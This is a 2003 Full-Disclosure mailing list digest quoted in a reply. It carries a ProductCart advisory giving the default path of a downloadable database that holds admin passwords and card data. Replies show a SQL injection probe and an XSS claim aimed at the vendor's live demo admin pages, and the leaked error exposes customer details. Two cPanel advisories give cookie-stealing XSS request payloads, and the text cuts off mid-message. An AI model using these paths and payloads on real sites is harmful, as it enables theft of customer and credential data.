On Sun, 2003-07-06 at 16:00, [EMAIL PROTECTED] wrote: > Send Full-Disclosure mailing list submissions to > [EMAIL PROTECTED] > > To subscribe or unsubscribe via the World Wide Web, visit > http://lists.netsys.com/mailman/listinfo/full-disclosure > or, via email, send a message with subject or body 'help' to > [EMAIL PROTECTED] > > You can reach the person managing the list at > [EMAIL PROTECTED] > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of Full-Disclosure digest..." > > > Today's Topics: > > 1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri > Huynh) > 2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely > (gyrniff) > 3. Re: [Vulnerability] : ProductCart database file > can be downloaded remotely (KF) > 4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely > (morning_wood) > 5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) > 6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) > 7. Re: tripbid secure codes (Dave Korn) > 8. Re: [Vulnerability] : ProductCart database file > can be downloaded remotely (Larry W. Cashdollar) > 9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen) > > --__--__-- > > Message: 1 > From: "Tri Huynh" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Cc: <[EMAIL PROTECTED]> > Date: Sat, 5 Jul 2003 13:07:51 -0700 > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be > downloaded remotely > > This is a multi-part message in MIME format. > > ------=_NextPart_000_0053_01C342F6.70CDCF30 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > ProductCart database file can be downloaded remotely > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > PROGRAM: ProductCart > HOMEPAGE: http://www.earlyimpact.com/productcart/ > VULNERABLE VERSIONS: 1.0 to 2.0 > RISK: High > > > DESCRIPTION > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > ProductCart=AE is an ASP shopping cart that combines sophisticated=20 > ecommerce features with time-saving store management tools and = > remarkable=20 > ease of use. It is widely used by many e-commerce sites. > > DETAILS > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > In the default installation, product cart database file is located at=20 > /productcart/database/EIPC.mdb which can be accessed easily > by any remote attackers. > > Sample: http://victimhost/productcart/database/EIPC.mdb > > The database file includes the store administration password as well as=20 > customer's info (including credit card info).=20 > =20 > > WORKAROUND > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > Rename the database file, put it in a protected directory. > > > CREDITS > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > Discovered by Tri Huynh from Sentry Union > > > DISLAIMER > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > The information within this paper may change without notice. Use of > this information constitutes acceptance for use in an AS IS condition. > There are NO warranties with regard to this information. In no event > shall the author be liable for any damages whatsoever arising out of > or in connection with the use or spread of this information. Any use > of this information is at the user's own risk. > > > FEEDBACK > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > Please send suggestions, updates, and comments to: [EMAIL PROTECTED] > > > > > ------=_NextPart_000_0053_01C342F6.70CDCF30 > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> > <HTML><HEAD> > <META http-equiv=3DContent-Type content=3D"text/html; = > charset=3Diso-8859-1"> > <META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR> > <STYLE></STYLE> > </HEAD> > <BODY bgColor=3D#ffffff> > <DIV><FONT face=3DArial size=3D2><!--StartFragment -->ProductCart = > database file can=20 > be downloaded=20 > remotely<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D<BR><BR>PROGRAM:=20 > ProductCart</FONT></DIV> > <DIV><FONT face=3DArial size=3D2>HOMEPAGE: <A=20 > href=3D"http://www.earlyimpact.com/productcart/";>http://www.earlyimpact.c= > om/productcart/</A><BR>VULNERABLE=20 > VERSIONS: 1.0 to 2.0</FONT></DIV> > <DIV><FONT face=3DArial size=3D2>RISK: High</FONT></DIV><FONT = > face=3DArial size=3D2> > <DIV><BR> </DIV> > <DIV>DESCRIPTION<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D<BR><BR><!--StartFragment -->ProductCart=AE=20 > is an ASP shopping cart that combines sophisticated </DIV> > <DIV>ecommerce features with time-saving store management tools and = > > remarkable </DIV> > <DIV>ease of use. It is widely used by many e-commerce=20 > sites.<BR><BR>DETAILS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>In=20 > the default installation, product cart database file is located at = > </DIV> > <DIV>/productcart/database/EIPC.mdb which can be accessed easily</DIV> > <DIV>by any remote attackers.</DIV> > <DIV> </DIV> > <DIV>Sample: <A=20 > href=3D"http://victimhost/productcart/database/EIPC.mdb";>http://victimhos= > t/productcart/database/EIPC.mdb</A></DIV> > <DIV> </DIV> > <DIV>The database file includes the store administration password as = > well as=20 > </DIV> > <DIV>customer's info (including credit card info). </DIV> > <DIV> <BR><BR>=20 > WORKAROUND<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D<BR><BR>Rename=20 > the database file, put it in a protected=20 > directory.<BR><BR><BR>CREDITS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Discovered=20 > by Tri Huynh from Sentry Union</DIV> > <DIV><BR><BR>DISLAIMER<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>The=20 > information within this paper may change without notice. Use of<BR>this=20 > information constitutes acceptance for use in an AS IS = > condition.<BR>There are=20 > NO warranties with regard to this information. In no event<BR>shall the = > author=20 > be liable for any damages whatsoever arising out of<BR>or in connection = > with the=20 > use or spread of this information. Any use<BR>of this information is at = > the=20 > user's own=20 > risk.<BR><BR><BR>FEEDBACK<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Please=20 > send suggestions, updates, and comments to: <A=20 > href=3D"mailto:[EMAIL PROTECTED]">[EMAIL PROTECTED]</A><BR><BR><BR><BR>= > </DIV></FONT></BODY></HTML> > > ------=_NextPart_000_0053_01C342F6.70CDCF30-- > > > --__--__-- > > Message: 2 > From: gyrniff <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be > downloaded remotely > Date: Sat, 5 Jul 2003 19:37:41 +0200 > > URL: > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > Change the name Paul to Paul' > > Microsoft OLE DB Provider for ODBC Drivers > error '80040e14' > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > address='3226 Colorado Ave', city='Santa Monica', zip='90004', > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > have a nice weekend ;-) > > On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > ProductCart database file can be downloaded remotely > > ================================================= > > > > PROGRAM: ProductCart > > HOMEPAGE: http://www.earlyimpact.com/productcart/ > > VULNERABLE VERSIONS: 1.0 to 2.0 > > RISK: High > > > > > > DESCRIPTION > > ================================================= > > > > ProductCart� is an ASP shopping cart that combines sophisticated > > ecommerce features with time-saving store management tools and remarkable > > ease of use. It is widely used by many e-commerce sites. > > > > DETAILS > > ================================================= > > > > In the default installation, product cart database file is located at > > /productcart/database/EIPC.mdb which can be accessed easily > > by any remote attackers. > > > > Sample: http://victimhost/productcart/database/EIPC.mdb > > > > The database file includes the store administration password as well as > > customer's info (including credit card info). > > > > > > WORKAROUND > > ================================================= > > > > Rename the database file, put it in a protected directory. > > > > > > CREDITS > > ================================================= > > > > Discovered by Tri Huynh from Sentry Union > > > > > > DISLAIMER > > ================================================= > > > > The information within this paper may change without notice. Use of > > this information constitutes acceptance for use in an AS IS condition. > > There are NO warranties with regard to this information. In no event > > shall the author be liable for any damages whatsoever arising out of > > or in connection with the use or spread of this information. Any use > > of this information is at the user's own risk. > > > > > > FEEDBACK > > ================================================= > > > > Please send suggestions, updates, and comments to: [EMAIL PROTECTED] > > > --__--__-- > > Message: 3 > Date: Sat, 05 Jul 2003 15:30:28 -0400 > From: KF <[EMAIL PROTECTED]> > To: gyrniff <[EMAIL PROTECTED]> > CC: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file > can be downloaded remotely > > Was that legit California data? I am sure than making someone have a > nice weekend you just made multiple someones have a shitty month ahead > of them... > http://www.theregister.co.uk/content/55/31509.html > > -KF > > gyrniff wrote: > > >URL: > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > >Change the name Paul to Paul' > > > >Microsoft OLE DB Provider for ODBC Drivers > > error '80040e14' > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > >address='3226 Colorado Ave', city='Santa Monica', zip='90004', > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > > >have a nice weekend ;-) > > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > > > >>ProductCart database file can be downloaded remotely > >>================================================= > >> > >>PROGRAM: ProductCart > >>HOMEPAGE: http://www.earlyimpact.com/productcart/ > >>VULNERABLE VERSIONS: 1.0 to 2.0 > >>RISK: High > >> > >> > >>DESCRIPTION > >>================================================= > >> > >>ProductCart� is an ASP shopping cart that combines sophisticated > >>ecommerce features with time-saving store management tools and remarkable > >>ease of use. It is widely used by many e-commerce sites. > >> > >>DETAILS > >>================================================= > >> > >>In the default installation, product cart database file is located at > >>/productcart/database/EIPC.mdb which can be accessed easily > >>by any remote attackers. > >> > >>Sample: http://victimhost/productcart/database/EIPC.mdb > >> > >>The database file includes the store administration password as well as > >>customer's info (including credit card info). > >> > >> > >> WORKAROUND > >>================================================= > >> > >>Rename the database file, put it in a protected directory. > >> > >> > >>CREDITS > >>================================================= > >> > >>Discovered by Tri Huynh from Sentry Union > >> > >> > >>DISLAIMER > >>================================================= > >> > >>The information within this paper may change without notice. Use of > >>this information constitutes acceptance for use in an AS IS condition. > >>There are NO warranties with regard to this information. In no event > >>shall the author be liable for any damages whatsoever arising out of > >>or in connection with the use or spread of this information. Any use > >>of this information is at the user's own risk. > >> > >> > >>FEEDBACK > >>================================================= > >> > >>Please send suggestions, updates, and comments to: [EMAIL PROTECTED] > >> > >> > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > > --__--__-- > > Message: 4 > From: "morning_wood" <[EMAIL PROTECTED]> > To: "gyrniff" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be > downloaded remotely > Date: Sat, 5 Jul 2003 15:24:46 -0700 > > vuln to XSS too.. > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp > > ----- Original Message ----- > From: "gyrniff" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Saturday, July 05, 2003 10:37 AM > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database > file can be downloaded remotely > > > > URL: > > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > Change the name Paul to Paul' > > > > Microsoft OLE DB Provider for ODBC Drivers > > error '80040e14' > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing > operator) in > > query expression ''Paul'',lastName='Smith',customerCompany='Early > Impact', > > address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE > idCustomer=115'. > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, > line 36 > > > > have a nice weekend ;-) > > > > On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > ProductCart database file can be downloaded remotely > > > ================================================= > > > > > > PROGRAM: ProductCart > > > HOMEPAGE: http://www.earlyimpact.com/productcart/ > > > VULNERABLE VERSIONS: 1.0 to 2.0 > > > RISK: High > > > > > > > > > DESCRIPTION > > > ================================================= > > > > > > ProductCart� is an ASP shopping cart that combines sophisticated > > > ecommerce features with time-saving store management tools and > remarkable > > > ease of use. It is widely used by many e-commerce sites. > > > > > > DETAILS > > > ================================================= > > > > > > In the default installation, product cart database file is located > at > > > /productcart/database/EIPC.mdb which can be accessed easily > > > by any remote attackers. > > > > > > Sample: http://victimhost/productcart/database/EIPC.mdb > > > > > > The database file includes the store administration password as > well as > > > customer's info (including credit card info). > > > > > > > > > WORKAROUND > > > ================================================= > > > > > > Rename the database file, put it in a protected directory. > > > > > > > > > CREDITS > > > ================================================= > > > > > > Discovered by Tri Huynh from Sentry Union > > > > > > > > > DISLAIMER > > > ================================================= > > > > > > The information within this paper may change without notice. Use > of > > > this information constitutes acceptance for use in an AS IS > condition. > > > There are NO warranties with regard to this information. In no > event > > > shall the author be liable for any damages whatsoever arising out > of > > > or in connection with the use or spread of this information. Any > use > > > of this information is at the user's own risk. > > > > > > > > > FEEDBACK > > > ================================================= > > > > > > Please send suggestions, updates, and comments to: > [EMAIL PROTECTED] > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > --__--__-- > > Message: 5 > From: Ory Segal <[EMAIL PROTECTED]> > To: "BugTraq (E-mail)" <[EMAIL PROTECTED]>, > "Full Disclosure (E-mail)" <[EMAIL PROTECTED]>, > "WebAppSec (E-mail)" <[EMAIL PROTECTED]> > Date: Sun, 6 Jul 2003 01:39:33 -0700 > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability > > This message is in MIME format. Since your mail reader does not understand > this format, some or all of this message may not be legible. > > ------_=_NextPart_001_01C3439A.1FBE84F0 > Content-Type: text/plain; > charset="iso-8859-1" > > //////////////////////////////////////////////////////////////////////////// > /// > //==========================>> Security Advisory > <<==========================// > //////////////////////////////////////////////////////////////////////////// > /// > > ---------------------------------------------------------------------------- > --- > -----[ cPanel Malicious HTML Tags Injection Vulnerability > ---------------------------------------------------------------------------- > --- > > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com > --[ Discovery Date: 06/17/2003 (Vendor was notified) > --[ Release Date: 07/06/2003 > --[ Product: Tested on cPanel 6.4.2-STABLE > --[ Severity: Medium > --[ CVE: Not assigned yet > > --[ Summary > > From the vendor's web site: > "...The Cpanel interface is a client side interface, which allows your > customers > to easily control a web hosting account. With the touch of a button, they > can > add e-mail accounts, access their files, backup their files, setup a > shopping > cart, and more..." > > Web users can embed Malicious HTML tags in HTTP requests, which will later > be parsed by the web site administrator's browser, in several cPanel > screens. > This may lead to theft of cookies associated with the domain, or execution > of > client-side scripts in the administrator's browser. > > --[ Description > > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web > site > administrator with HTTP request logs. These scripts do not sanitize the URL > part > of HTTP requests and present them to the administrator as is, thus, allowing > an > attacker to embed malicious HTML tags that will later be parsed and executed > by > the administrators browser. > > For example, lets take a look at the 'Error Log' screen: > > [From errlog.html] > ... > <b>Last 300 Error Log Messages in reverse order:</b><hr> > <pre> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: > /home/dir/public_html/foobar.html > </pre> > ... > > The following request will present a pop-up screen with the cookies > that are currently associated with the domain: > > GET /<script>alert(document.cookie);</script> HTTP/1.0 > Host: www.site.com > > > --[ Note > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented > the > latest requests as HTML links, thus the malicious payload must terminate the > <a> > tag before opening a new one. For example: > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 > Host: www.site.com > > --[ Solution > > According to the vendor, the problem was fixed in version 7.0, which can be > downloaded at: http://www.cpanel.net/downloads.htm > > > > > Ory Segal > Senior Security Engineer > Sanctum, Inc. > http://www.SanctumInc.Com/ > > Ampa Bldg., 1 Sapir Street. > Mail: P.O.Box 12047 > Herzliya 46733, ISRAEL > > Tel: +972-9-9586077 Ext. 236 > Fax: +972-9-9576337 > > > ------_=_NextPart_001_01C3439A.1FBE84F0 > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> > <HTML> > <HEAD> > <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = > charset=3Diso-8859-1"> > <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version = > 5.5.2653.12"> > <TITLE>cPanel Malicious HTML Tags Injection Vulnerability</TITLE> > </HEAD> > <BODY> > > <P><FONT = > SIZE=3D2>///////////////////////////////////////////////////////////////= > ////////////////</FONT> > <BR><FONT = > SIZE=3D2>//=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D=3D>> Security Advisory = > <<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > =3D=3D=3D=3D//</FONT> > <BR><FONT = > SIZE=3D2>///////////////////////////////////////////////////////////////= > ////////////////</FONT> > </P> > > <P><FONT = > SIZE=3D2>---------------------------------------------------------------= > ----------------</FONT> > <BR><FONT SIZE=3D2>-----[ cPanel Malicious HTML Tags Injection = > Vulnerability</FONT> > <BR><FONT = > SIZE=3D2>---------------------------------------------------------------= > ----------------</FONT> > </P> > > <P><FONT SIZE=3D2>--[ Author: Ory Segal, Sanctum inc. <A = > HREF=3D"http://www.SanctumInc.com"; = > TARGET=3D"_blank">http://www.SanctumInc.com</A></FONT> > <BR><FONT SIZE=3D2>--[ Discovery Date: 06/17/2003 (Vendor was = > notified)</FONT> > <BR><FONT SIZE=3D2>--[ Release Date: 07/06/2003 </FONT> > <BR><FONT SIZE=3D2>--[ Product: Tested on cPanel 6.4.2-STABLE</FONT> > <BR><FONT SIZE=3D2>--[ Severity: Medium</FONT> > <BR><FONT SIZE=3D2>--[ CVE: Not assigned yet</FONT> > </P> > > <P><FONT SIZE=3D2>--[ Summary</FONT> > </P> > > <P><FONT SIZE=3D2>From the vendor's web site:</FONT> > <BR><FONT SIZE=3D2>"...The Cpanel interface is a client side = > interface, which allows your customers </FONT> > <BR><FONT SIZE=3D2>to easily control a web hosting account. With the = > touch of a button, they can </FONT> > <BR><FONT SIZE=3D2>add e-mail accounts, access their files, backup = > their files, setup a shopping </FONT> > <BR><FONT SIZE=3D2>cart, and more..."</FONT> > </P> > > <P><FONT SIZE=3D2>Web users can embed Malicious HTML tags in HTTP = > requests, which will later </FONT> > <BR><FONT SIZE=3D2>be parsed by the web site administrator's browser, = > in several cPanel screens. </FONT> > <BR><FONT SIZE=3D2>This may lead to theft of cookies associated with = > the domain, or execution of </FONT> > <BR><FONT SIZE=3D2>client-side scripts in the administrator's = > browser.</FONT> > <BR><FONT SIZE=3D2> </FONT> > <BR><FONT SIZE=3D2>--[ Description</FONT> > </P> > > <P><FONT SIZE=3D2>The 'Error Log' and 'Latest Visitors' screens in = > cPanel, provide the web site </FONT> > <BR><FONT SIZE=3D2>administrator with HTTP request logs. These scripts = > do not sanitize the URL part </FONT> > <BR><FONT SIZE=3D2>of HTTP requests and present them to the = > administrator as is, thus, allowing an </FONT> > <BR><FONT SIZE=3D2>attacker to embed malicious HTML tags that will = > later be parsed and executed by </FONT> > <BR><FONT SIZE=3D2>the administrators browser.</FONT> > </P> > > <P><FONT SIZE=3D2>For example, lets take a look at the 'Error Log' = > screen:</FONT> > </P> > > <P><FONT SIZE=3D2>[From errlog.html]</FONT> > <BR><FONT SIZE=3D2>...</FONT> > <BR><FONT SIZE=3D2><b>Last 300 Error Log Messages in reverse = > order:</b><hr></FONT> > <BR><FONT SIZE=3D2><pre></FONT> > <BR><FONT SIZE=3D2>[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] = > File does not exist: </FONT> > <BR><FONT SIZE=3D2>/home/dir/public_html/foobar.html</FONT> > <BR><FONT SIZE=3D2></pre></FONT> > <BR><FONT SIZE=3D2>...</FONT> > </P> > > <P><FONT SIZE=3D2>The following request will present a pop-up screen = > with the cookies </FONT> > <BR><FONT SIZE=3D2>that are currently associated with the = > domain:</FONT> > </P> > > <P><FONT SIZE=3D2> GET = > /<script>alert(document.cookie);</script> HTTP/1.0</FONT> > <BR><FONT SIZE=3D2> Host: www.site.com</FONT> > </P> > <BR> > > <P><FONT SIZE=3D2>--[ Note</FONT> > </P> > > <P><FONT SIZE=3D2>The 'Latest Visitors' screen of the tested version = > (6.4.2-STABLE) presented the </FONT> > <BR><FONT SIZE=3D2>latest requests as HTML links, thus the malicious = > payload must terminate the <a> </FONT> > <BR><FONT SIZE=3D2>tag before opening a new one. For example:</FONT> > </P> > > <P><FONT SIZE=3D2> GET = > /"></a><script>alert(document.cookie);</script>= > ; HTTP/1.0</FONT> > <BR><FONT SIZE=3D2> Host: www.site.com</FONT> > </P> > > <P><FONT SIZE=3D2>--[ Solution</FONT> > </P> > > <P><FONT SIZE=3D2>According to the vendor, the problem was fixed in = > version 7.0, which can be </FONT> > <BR><FONT SIZE=3D2>downloaded at: <A = > HREF=3D"http://www.cpanel.net/downloads.htm"; = > TARGET=3D"_blank">http://www.cpanel.net/downloads.htm</A></FONT> > </P> > <BR> > <BR> > <BR> > > <P><FONT = > SIZE=3D2> Ory = > Segal</FONT> > <BR><FONT SIZE=3D2> Senior Security Engineer</FONT> > <BR><FONT SIZE=3D2> Sanctum, = > Inc.</FONT> > <BR><FONT SIZE=3D2> <A HREF=3D"http://www.SanctumInc.Com/"; = > TARGET=3D"_blank">http://www.SanctumInc.Com/</A></FONT> > </P> > > <P><FONT SIZE=3D2>Ampa Bldg., 1 Sapir Street.</FONT> > <BR><FONT SIZE=3D2>Mail: = > P.O.Box 12047</FONT> > <BR><FONT SIZE=3D2>Herzliya 46733, = > ISRAEL</FONT> > </P> > > <P><FONT SIZE=3D2>Tel: +972-9-9586077 Ext. 236</FONT> > <BR><FONT SIZE=3D2>Fax: +972-9-9576337</FONT> > </P> > > </BODY> > </HTML> > ------_=_NextPart_001_01C3439A.1FBE84F0-- > > --__--__-- > > Message: 6 > Date: Sun, 06 Jul 2003 11:46:44 +0300 > From: Ory Segal <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED], [EMAIL PROTECTED], > [EMAIL PROTECTED] > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability > > ------------------------------------------------------------------------------- > -----[ cPanel Malicious HTML Tags Injection Vulnerability > ------------------------------------------------------------------------------- > > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com > --[ Discovery Date: 06/17/2003 (Vendor was notified) > --[ Release Date: 07/06/2003 > --[ Product: Tested on cPanel 6.4.2-STABLE > --[ Severity: Medium > --[ CVE: Not assigned yet > > --[ Summary > > From the vendor's web site: > "...The Cpanel interface is a client side interface, which allows your > customers > to easily control a web hosting account. With the touch of a button, > they can > add e-mail accounts, access their files, backup their files, setup a > shopping > cart, and more..." > > Web users can embed Malicious HTML tags in HTTP requests, which will later > be parsed by the web site administrator's browser, in several cPanel > screens. > This may lead to theft of cookies associated with the domain, or > execution of > client-side scripts in the administrator's browser. > > --[ Description > > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web > site > administrator with HTTP request logs. These scripts do not sanitize the > URL part > of HTTP requests and present them to the administrator as is, thus, > allowing an > attacker to embed malicious HTML tags that will later be parsed and > executed by > the administrators browser. > > For example, lets take a look at the 'Error Log' screen: > > [From errlog.html] > ... > <b>Last 300 Error Log Messages in reverse order:</b><hr> > <pre> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: > /home/dir/public_html/foobar.html > </pre> > ... > > The following request will present a pop-up screen with the cookies > that are currently associated with the domain: > > GET /<script>alert(document.cookie);</script> HTTP/1.0 > Host: www.site.com > > > --[ Note > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) > presented the > latest requests as HTML links, thus the malicious payload must terminate > the <a> > tag before opening a new one. For example: > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 > Host: www.site.com > > --[ Solution > > According to the vendor, the problem was fixed in version 7.0, which can be > downloaded at: http://www.cpanel.net/downloads.htm > > > > > > > > > > > > > > > > > > > > --__--__-- > > Message: 7 > From: "Dave Korn" <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] tripbid secure codes > Date: Sun, 06 Jul 2003 12:23:01 +0000 > > > ----- Original Message ----- > From: <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Friday, June 27, 2003 6:25 AM > Subject: [Full-Disclosure] tripbid secure codes > > > >i post the thing to the vuln dev some days ago and get quite a big > respnose. > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but > >some folks want me to look at the code they make, specially a 'hello- > >world.c' progie -> " holo, can you check my hello-world.c for strcpy > >?? securecode do the trick " <- paraphase the msg, i rm -rf / it since > >it make me anger and stress it ! > > > >i am willing to try the secure code since the grep 'strcpy' is losing > >his thrills so i trick around with : > >[EMAIL PROTECTED] ./securecode -s hello-world.c > > > Never ever EVER run an insecure program over arbitrary data you receive from > the net without checking it for safety first..... Let's look at this > hello-world.c before we run anything on it.... > > > Z:\sploits-misc\targzip>type hello-world.c > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!? > > ?!? ?!? ?!? ?!? ?!? ?!? > 